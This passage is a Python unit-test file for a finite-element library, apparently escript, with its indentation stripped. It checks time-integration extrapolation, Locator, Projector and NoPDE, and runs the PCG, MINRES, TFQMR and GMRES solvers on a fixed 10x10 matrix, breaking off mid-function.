DEBUG=False
VERBOSE=False
def test_TimeIntegrationManager_scalar(self):
t=0.
dt=0.1
tm=TimeIntegrationManager(0.,p=1)
while t<1.:
t+=dt
tm.checkin(dt,t)
v_guess=tm.extrapolate(dt)
self.assertLess(abs(v_guess-(tm.getTime()+dt)), self.RES_TOL, "extrapolation is wrong")
def test_TimeIntegrationManager_vector(self):
t=0.
dt=0.3
tm=TimeIntegrationManager(0.,0.,p=1)
while t<1.:
t+=dt
tm.checkin(dt,t,3*t)
v_guess=tm.extrapolate(dt)
e=max(abs(v_guess[0]-(tm.getTime()+dt)),abs(v_guess[1]-(tm.getTime()+dt)*3.))
self.assertLess(e, self.RES_TOL)
def test_Locator(self):
x=self.domain.getX()
l=Locator(self.domain,numpy.ones((self.domain.getDim(),)))
self.assertTrue(ContinuousFunction(self.domain)==l.getFunctionSpace(),"wrong function space from domain")
l=Locator(ContinuousFunction(self.domain),numpy.ones((self.domain.getDim(),)))
self.assertTrue(ContinuousFunction(self.domain)==l.getFunctionSpace(),"wrong function space")
xx=l.getX()
self.assertTrue(isinstance(xx,numpy.ndarray),"wrong vector type")
self.assertTrue(Lsup(xx-numpy.ones((self.domain.getDim(),)))<self.RES_TOL,"location wrong")
xx=l(x)
self.assertTrue(isinstance(xx,numpy.ndarray),"wrong vector type")
self.assertTrue(Lsup(xx-numpy.ones((self.domain.getDim(),)))<self.RES_TOL,"value wrong vector")
xx=l(x[0]+x[1])
self.assertTrue(isinstance(xx,float),"wrong scalar type")
self.assertTrue(abs(xx-2.)<self.RES_TOL,"value wrong scalar")
# now with interpolation:
l=Locator(Function(self.domain),numpy.ones((self.domain.getDim(),)))
x2=Function(self.domain).getX()
xx=l(x)
self.assertTrue(isinstance(xx,numpy.ndarray),"wrong vector type")
self.assertTrue(Lsup(xx-l(x2))<self.RES_TOL,"location wrong")
xx=l(x[0]+x[1])
self.assertTrue(isinstance(xx,float),"wrong scalar type")
self.assertLess(abs(xx-l(x2[0])-l(x2[1])), self.RES_TOL)
l=Locator(self.domain,numpy.ones((self.domain.getDim(),)))
d=Data(0, ContinuousFunction(self.domain))
l.setValue(d, 7)
self.assertTrue(sup(d)>6, "value not set") # guarantees we have set something
self.assertLess(Lsup(l.getValue(d)-7), self.RES_TOL, "value not set in the correct place")
def test_Locator_withList(self):
x=self.domain.getX()
arg=[numpy.ones((self.domain.getDim(),)), numpy.zeros((self.domain.getDim(),))]
l=Locator(self.domain,arg)
self.assertTrue(ContinuousFunction(self.domain)==l.getFunctionSpace(),"wrong function space from domain")
l=Locator(ContinuousFunction(self.domain),arg)
self.assertTrue(ContinuousFunction(self.domain)==l.getFunctionSpace(),"wrong function space")
xx=l.getX()
self.assertTrue(isinstance(xx,list),"list expected")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],numpy.ndarray),"vector expected for %s item"%i)
self.assertTrue(Lsup(xx[i]-arg[i])<self.RES_TOL,"%s-th location is wrong"%i)
xx=l(x)
self.assertTrue(isinstance(xx,list),"list expected (2)")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],numpy.ndarray),"vector expected for %s item (2)"%i)
self.assertTrue(Lsup(xx[i]-arg[i])<self.RES_TOL,"%s-th location is wrong (2)"%i)
xx=l(x[0]+x[1])
self.assertTrue(isinstance(xx,list),"list expected (3)")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],float),"wrong scalar type")
self.assertTrue(abs(xx[i]-(arg[i][0]+arg[i][1]))<self.RES_TOL,"value wrong scalar")
# now with interpolation:
l=Locator(Function(self.domain),arg)
self.assertTrue(Function(self.domain)==l.getFunctionSpace(),"wrong function space")
xx=l(x)
x2=Function(self.domain).getX()
self.assertTrue(isinstance(xx,list),"list expected (2)")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],numpy.ndarray),"vector expected for %s item (2)"%i)
self.assertTrue(Lsup(xx[i]-l(x2)[i])<self.RES_TOL,"%s-th location is wrong (2)"%i)
xx=l(x[0]+x[1])
self.assertTrue(isinstance(xx,list),"list expected (3)")
for i in range(len(xx)):
self.assertTrue(isinstance(xx[i],float),"wrong scalar type")
self.assertLess(abs(xx[i]-(l(x2[0])[i]+l(x2[1])[i])), self.RES_TOL)
l=Locator(self.domain,numpy.ones((self.domain.getDim(),)))
d=Data(0, ContinuousFunction(self.domain))
l.setValue(d, 7)
self.assertTrue(sup(d)>6, "value not set") # guarantees we have set something
self.assertLess(Lsup(l.getValue(d)-7), self.RES_TOL, "value not set in the correct place")
def testProjector_rank0(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=x[0]
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank1(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=x
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank2(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[11.,12.],[21,22.]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank3(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank4(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank0_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=x[0]
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank1_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=x
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank2_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=[[11.,12.],[21,22.]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank3_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=[[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank4_reduced(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=[[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank0_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=x[0]
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank1_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=x
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank2_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[11.,12.],[21,22.]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank3_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank4_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=False,fast=False)
td_ref=[[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank0_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=1.
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank1_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=numpy.array([1.,2.,3.])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank2_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=numpy.array([[11.,12.],[21,22.]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank3_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=numpy.array([[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def testProjector_rank4_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
p=Projector(self.domain,reduce=True,fast=False)
td_ref=numpy.array([[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*self.RES_TOL)
def test_NoPDE_scalar_missing_r(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])
p.setValue(D=1.,Y=1.,q=msk)
u=p.getSolution()
u_ex=(1.-msk)
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_scalar_missing_Y(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])
p.setValue(D=1.,q=msk,r=2.)
u=p.getSolution()
u_ex=msk*2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_scalar_constant(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])
p.setValue(D=1.,Y=1.,q=msk,r=2.)
u=p.getSolution()
u_ex=(1.-msk)+msk*2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_scalar_variable(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])
p.setValue(D=10,Y=2*10,q=msk,r=2.)
u=p.getSolution()
u_ex=2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_vector_missing_Y(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])*[1.,0.]
p.setValue(D=numpy.ones([2]),q=msk,r=2.)
u=p.getSolution()
u_ex=msk*2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_vector_missing_r(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])*[1.,0.]
p.setValue(D=numpy.ones([2]),Y=numpy.ones([2]),q=msk)
u=p.getSolution()
u_ex=(1.-msk)
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_vector_constant(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])*[1.,0.]
p.setValue(D=numpy.ones([2]),Y=numpy.ones([2]),q=msk,r=2.)
u=p.getSolution()
u_ex=(1.-msk)+msk*2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
def test_NoPDE_vector_variable(self):
p=NoPDE(self.domain)
x=self.domain.getX()
msk=whereZero(x[0])*[1.,0.]
p.setValue(D=x[:2]+1,Y=2*(x[:2]+1),q=msk,r=2.)
u=p.getSolution()
u_ex=2.
self.assertLess(Lsup(u_ex-u), Lsup(u_ex)*self.RES_TOL)
#=====
def testPCG(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
return dot(A,x)
def Ms(b):
out=zeros((b.size,),float64)
for i in range(size(b)):
out[i]=b[i]/A[i,i]
return out
tol=1.e-4
x,r,a_norm=PCG(b*1.,Ap,x_ref*0.,Ms,dot, atol=0, rtol=tol, iter_max=12)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
self.assertLess(Lsup(r-(b-dot(A,x))), Lsup(b)*EPSILON*100.)
def testMINRES(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
return dot(A,x)
def Ms(b):
out=zeros((size(b),),float64)
for i in range(size(b)):
out[i]=b[i]/A[i,i]
return out
tol=1.e-4
x=MINRES(b*1.,Ap,x_ref*0,Ms,dot, atol=0, rtol=tol, iter_max=12)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
def testTFQMR(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
out=dot(A,x)
for i in range(size(x)):
out[i]/=A[i,i]
return out
tol=1.e-5
for i in range(size(b)): b[i]/=A[i,i]
x=TFQMR(b,Ap,x_ref*0,dot, atol=0, rtol=tol, iter_max=12)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
def testGMRES(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
b=dot(A,x)
for i in range(size(b)):
b[i]/=A[i,i]
return b
tol=1.e-4
for i in range(size(b)): b[i]/=A[i,i]
x=GMRES(b,Ap,x_ref*0,dot,atol=0, rtol=tol, iter_max=12)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
def testGMRES_P_R(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
